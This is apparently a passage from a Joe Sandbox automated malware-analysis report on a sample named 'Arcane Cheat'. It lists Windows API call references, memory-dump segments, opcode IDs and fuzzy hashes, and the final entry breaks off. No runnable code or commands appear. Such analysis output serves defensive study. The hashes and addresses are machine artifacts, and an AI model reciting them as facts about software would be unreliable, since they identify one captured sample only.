                                  • Instruction Fuzzy Hash: 3121B13114835AABC714DE24D891AAABBE4FF95744F04081CF8C1C7181D329EE4CEBA2
                                  APIs
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0084A4B8
                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0084A4C5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AddressProc__crt_fast_encode_pointer
                                  • String ID:
                                  • API String ID: 2279764990-0
                                  • Opcode ID: fbfbaa4803bea2c1a8cc72dc102eb4d48eaa288f592f4797a9f7e1567b8ddfd2
                                  • Instruction ID: 1e8283c3923a1a2c4fb74b2c03330a5fdefca08b4ce8573c9f4116812082e1be
                                  • Opcode Fuzzy Hash: fbfbaa4803bea2c1a8cc72dc102eb4d48eaa288f592f4797a9f7e1567b8ddfd2
                                  • Instruction Fuzzy Hash: 03113633A402288B9F2EDE2CEC4486E7395FB803647164260FD16EF284EA74DC41C7D6
                                  APIs
                                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00829B35,?,?,00000000,?,?,00828D9C,?), ref: 00829BC0
                                  • GetLastError.KERNEL32 ref: 00829BCD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: f404e2230993714e97cd84f21e6441f3227869f786e28effe25bf9632cd6b3c6
                                  • Instruction ID: 3e0113fb51c2baef86d825c2c4adfce5f407a7c278410481f37ac0f6d01024a2
                                  • Opcode Fuzzy Hash: f404e2230993714e97cd84f21e6441f3227869f786e28effe25bf9632cd6b3c6
                                  • Instruction Fuzzy Hash: 9C01C4323043399B8B08CE69BC9497EB399FFC5732F14452DF996C7290DA31D8859A21
                                  APIs
                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00829E76
                                  • GetLastError.KERNEL32 ref: 00829E82
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: b8c3d4dc7ca04ec5bebea3ef1c1cb3a746fbf61753b835817ef5b4f833bc49b3
                                  • Instruction ID: 2a2732f2f764dbbd93295267878defc61d2fdc8d62ca4c5b9d5080d42bf89675
                                  • Opcode Fuzzy Hash: b8c3d4dc7ca04ec5bebea3ef1c1cb3a746fbf61753b835817ef5b4f833bc49b3
                                  • Instruction Fuzzy Hash: 51019E753043245BEB34DE69EC44B6BB6D9FB88329F15493EF186C2680DAB5EC888611
                                  APIs
                                  • _free.LIBCMT ref: 00848627
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00860F50,0082CE57,?,?,?,?,?,?), ref: 00848663
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Heap$AllocAllocate_free
                                  • String ID:
                                  • API String ID: 2447670028-0
                                  • Opcode ID: 2b5a76c05a5568f1ff09274146e9df56f5a1862495292b89865ed9e9efc49a2a
                                  • Instruction ID: 78f7ad769da6ebfc403c8d2fdabca145bb8237fbdd84e54f5000c05c4f301f19
                                  • Opcode Fuzzy Hash: 2b5a76c05a5568f1ff09274146e9df56f5a1862495292b89865ed9e9efc49a2a
                                  • Instruction Fuzzy Hash: C2F0F63250111DE6CBA12A69AC08F6F7B5CFFF1BB4F264116FC14D6191DF30C80155AA
                                  APIs
                                    • Part of subcall function 0084B610: GetEnvironmentStringsW.KERNEL32 ref: 0084B619
                                    • Part of subcall function 0084B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0084B63C
                                    • Part of subcall function 0084B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0084B662
                                    • Part of subcall function 0084B610: _free.LIBCMT ref: 0084B675
                                    • Part of subcall function 0084B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0084B684
                                  • _free.LIBCMT ref: 008479FD
                                  • _free.LIBCMT ref: 00847A04
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                  • String ID:
                                  • API String ID: 400815659-0
                                  • Opcode ID: d0245baa9a4edc1c98d0d1fb40561a49594e1ca64ee9716f69ed740bd170dcc5
                                  • Instruction ID: 6c2b2abc6cf51b30d81d8c01f4b2558d17e704472147436a3539bc14824b82d0
                                  • Opcode Fuzzy Hash: d0245baa9a4edc1c98d0d1fb40561a49594e1ca64ee9716f69ed740bd170dcc5
                                  • Instruction Fuzzy Hash: 58E02B13A0D46F01DB71B67E2C0669F0A48FF81334B110B2AF510DB0C2DF54C903015B
                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?), ref: 00830915
                                  • GetProcessAffinityMask.KERNEL32(00000000), ref: 0083091C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Process$AffinityCurrentMask
                                  • String ID:
                                  • API String ID: 1231390398-0
                                  • Opcode ID: 09b0b90821f0a437359713e4539768fd89f3eb970fd09ffc24a65f1a7689ffc7
                                  • Instruction ID: 2abcb8fb82bf82e2fcccb3d4ece2d2fb2659793e7b2288be1543e6ca90d999f2
                                  • Opcode Fuzzy Hash: 09b0b90821f0a437359713e4539768fd89f3eb970fd09ffc24a65f1a7689ffc7
                                  • Instruction Fuzzy Hash: 73E09B32A10209FB6F05CAB49C146BB7B9DFB84255B104179AC06D7501F534DD018EE0
                                  APIs
                                  • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A458
                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0082A27A,?,?,?,0082A113,?,00000001,00000000,?,?), ref: 0082A489
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 65bcb47f97f69ab1bd785f826535a9381041592e2b4f34d70bf168a315462e87
                                  • Instruction ID: 8a2bb234323a18d2c874c072d88214f1cfdfd2106e0a5c69162abcbdbf193835
                                  • Opcode Fuzzy Hash: 65bcb47f97f69ab1bd785f826535a9381041592e2b4f34d70bf168a315462e87
                                  • Instruction Fuzzy Hash: 3CF08C312402197BDB026E60EC45BD9776CFF04382F448051BC88E61A1DB7ACAA8AA51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemText_swprintf
                                  • String ID:
                                  • API String ID: 3011073432-0
                                  • Opcode ID: 42c9ed8b75bc74d0ff7b6f903a6850bc76636aed65247c0691366ed8293846e6
                                  • Instruction ID: 4597bc2c970aecc0135827fe77ba8e6aa097c777a65aacf385d7c618831863ce
                                  • Opcode Fuzzy Hash: 42c9ed8b75bc74d0ff7b6f903a6850bc76636aed65247c0691366ed8293846e6
                                  • Instruction Fuzzy Hash: 59F0EC7254034C7ADB11AB74EC06F99375DF704745F040655B604D30A2DE716A5047A3
                                  APIs
                                  • DeleteFileW.KERNELBASE(?,?,?,0082984C,?,?,00829688,?,?,?,?,00851FA1,000000FF), ref: 0082A13E
                                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0082984C,?,?,00829688,?,?,?,?,00851FA1,000000FF), ref: 0082A16C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 5916874b903761d816da9e56c0e098c0641af05d3549b6bbc10b739af6d3d9c9
                                  • Instruction ID: d27ad9676c331646ae1b7525b597897d3e8512ef4cdad871bd82849fef5e3b6e
                                  • Opcode Fuzzy Hash: 5916874b903761d816da9e56c0e098c0641af05d3549b6bbc10b739af6d3d9c9
                                  • Instruction Fuzzy Hash: B0E09235641318BBDB119F64EC41FE9775CFF083D2F484065B888D31A0DB659DE4AA91
                                  APIs
                                  • GdiplusShutdown.GDIPLUS(?,?,?,?,00851FA1,000000FF), ref: 0083A3D1
                                  • OleUninitialize.OLE32(?,?,?,?,00851FA1,000000FF), ref: 0083A3D6
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: GdiplusShutdownUninitialize
                                  • String ID:
                                  • API String ID: 3856339756-0
                                  • Opcode ID: 443a888c90caf847df038c00c4ba95d3a50f0edcb5ea92dceaea5b61fa939db6
                                  • Instruction ID: a305c00b25f8b927a874e8e0312cf93e008bdd4ce6555ae4830a0566bf59fbd1
                                  • Opcode Fuzzy Hash: 443a888c90caf847df038c00c4ba95d3a50f0edcb5ea92dceaea5b61fa939db6
                                  • Instruction Fuzzy Hash: 7DF03932618A54EFC7109B4DDC05B1AFBA8FB89B21F04436AF419C3BA0CF786800CAD1
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?,?,?,0082A189,?,008276B2,?,?,?,?), ref: 0082A1A5
                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0082A189,?,008276B2,?,?,?,?), ref: 0082A1D1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 5824b38078821d60d3534d3ef62586e34ceddd53a144ab6925b892a9c12542cb
                                  • Instruction ID: 50411fdc3e28c4931170f58c88e953cfc5881b94362c78ab995cc62dc582c12e
                                  • Opcode Fuzzy Hash: 5824b38078821d60d3534d3ef62586e34ceddd53a144ab6925b892a9c12542cb
                                  • Instruction Fuzzy Hash: E7E092355016285BCB20AB68EC05BD9B75CFB083F2F0042A1FD45E32D4D7749D949AE1
                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystem
                                  • String ID:
                                  • API String ID: 1175261203-0
                                  • Opcode ID: d7c4e1e5f0ba83de630aa64964262def917ead45325b5d35b8e6991c5d167112
                                  • Instruction ID: ca173dee837f9a6b165e7f9c227f82c679b7eb4851c8d5dc2093ff283271014e
                                  • Opcode Fuzzy Hash: d7c4e1e5f0ba83de630aa64964262def917ead45325b5d35b8e6991c5d167112
                                  • Instruction Fuzzy Hash: C3E0127690162C6BDB219AA4AC45FD6776CFF093C2F0400A5BA48D3144DA749A948BE1
                                  APIs
                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00839B30
                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00839B37
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: BitmapCreateFromGdipStream
                                  • String ID:
                                  • API String ID: 1918208029-0
                                  • Opcode ID: 242aa05f5ef38ccf0f0b1aeaf4770b533db4c3873e892f2472d16472d91b0875
                                  • Instruction ID: 8b151b448169f7e5a8c9608ad0644a7f7df1589c4d6e25e9690a7db221861dc3
                                  • Opcode Fuzzy Hash: 242aa05f5ef38ccf0f0b1aeaf4770b533db4c3873e892f2472d16472d91b0875
                                  • Instruction Fuzzy Hash: 22E0ED71901218EBDB50DF98D54179AB7E8FB44321F20805BF899D3240D6B16E449BD1
                                  APIs
                                    • Part of subcall function 0084329A: try_get_function.LIBVCRUNTIME ref: 008432AF
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0084217A
                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00842185
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                  • String ID:
                                  • API String ID: 806969131-0
                                  • Opcode ID: a5749b479b727158f48965fa212d8fdc4ca58c8cb0f17449c37d4181a8c3a8e6
                                  • Instruction ID: b6cd91e668f0aff169366f1c3b8e2936ed68a182c4ef3a86db3b8c92f73ba56a
                                  • Opcode Fuzzy Hash: a5749b479b727158f48965fa212d8fdc4ca58c8cb0f17449c37d4181a8c3a8e6
                                  • Instruction Fuzzy Hash: A5D0C92564C74E246D582AB82C565A93388FDA2BB93E00A86F630CA2D1EE59A145A112
                                  APIs
                                  • DloadLock.DELAYIMP ref: 0083DC73
                                  • DloadProtectSection.DELAYIMP ref: 0083DC8F
                                    • Part of subcall function 0083DE67: DloadObtainSection.DELAYIMP ref: 0083DE77
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Dload$Section$LockObtainProtect
                                  • String ID:
                                  • API String ID: 731663317-0
                                  • Opcode ID: a2c94da1a6e15ed94492a220da81006b18ca929febdc0768c9f8292c57dffa36
                                  • Instruction ID: f7f0108f4b5ca459fe74e02c7db75c80ad548a175dba13b544fb58a092326c40
                                  • Opcode Fuzzy Hash: a2c94da1a6e15ed94492a220da81006b18ca929febdc0768c9f8292c57dffa36
                                  • Instruction Fuzzy Hash: CED0C9701003008AC291AF28F98675C3271F784748FA41601E105C62A0DFB85485DB86
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ItemShowWindow
                                  • String ID:
                                  • API String ID: 3351165006-0
                                  • Opcode ID: 62f325098378a886ee32ee1d23e84e057272c389cddd3983b2f5531750426c95
                                  • Instruction ID: 2f1248909b9a80233f770fb5dd0839203227dd8863e9a0cbff269d82411d763f
                                  • Opcode Fuzzy Hash: 62f325098378a886ee32ee1d23e84e057272c389cddd3983b2f5531750426c95
                                  • Instruction Fuzzy Hash: 2EC0123A058200BECB020BB4DC0DD2FBBE8BBA4212F25C908B2A5C0060D238E010DB11
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: a53878c80e352317435af7a937ee2168f540a5ce5cfa6dd35bb1f35a42905a8a
                                  • Instruction ID: 9ba3ff3d670a01966cd8d6fbb1e0057ed6b6916f4ed658d902850fc93a06cd4e
                                  • Opcode Fuzzy Hash: a53878c80e352317435af7a937ee2168f540a5ce5cfa6dd35bb1f35a42905a8a
                                  • Instruction Fuzzy Hash: 81C1D734A042649FEF15CF68D48CBA97BA5FF25310F2840BADC46DF286CB359984CB61
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: H_prolog
                                  • String ID:
                                  • API String ID: 3519838083-0
                                  • Opcode ID: e9cc3f3b160c11f880956ab2c0b9b53b6427c35e1f59f6797aa4b7b3224920e4
                                  • Instruction ID: 7b790f4b1796798a732903feec17ee1f5c2484d01483373a910053dd0c99f783
                                  • Opcode Fuzzy Hash: e9cc3f3b160c11f880956ab2c0b9b53b6427c35e1f59f6797aa4b7b3224920e4
